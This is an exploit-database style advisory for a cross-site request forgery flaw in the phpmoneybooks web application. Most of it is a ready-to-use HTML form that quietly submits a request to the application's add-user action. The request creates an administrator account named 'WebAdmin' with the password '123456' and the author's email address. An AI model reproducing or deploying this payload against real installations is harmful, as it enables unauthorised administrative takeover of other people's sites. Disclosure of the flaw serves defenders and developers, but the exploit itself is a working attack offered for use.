id: 18251
date: 05/13/2012
title: phpmoneybooks CSRF Vulnerability (Add Admin)
author: AtT4CKxT3rR0r1ST
cves: 

phpmoneybooks CSRF Vulnerability (Add Admin)
====================================================================
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://phpmoneybooks.com/
.:. Tested On Demo : http://phpmoneybooks.com/demo/index.php
.:. Version        : All Version
.:. Gr34T$ T0 [aboud-el]
####################################################################
===[ Exploit ]===
<html>
<head>
<title>phpmoneybooks [Add Admin]</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/index.php?module=users&action=adduser">
<input type="hidden" name="RealName" value="WebAdmin"/>
<input type="hidden" name="UserName" value="WebAdmin"/>
<input type="hidden" name="AcctPass" value="123456"/>
<input type="hidden" name="AcctEmail" value="F.Hack@w.cn"/>
<input type="hidden" name="AcctSecurity" value="10"/>
<input type="hidden" name="CustSecurity" value=""/>
</form>
</body>
</html>
####################################################################



#  0day.today [2023-03-26]  #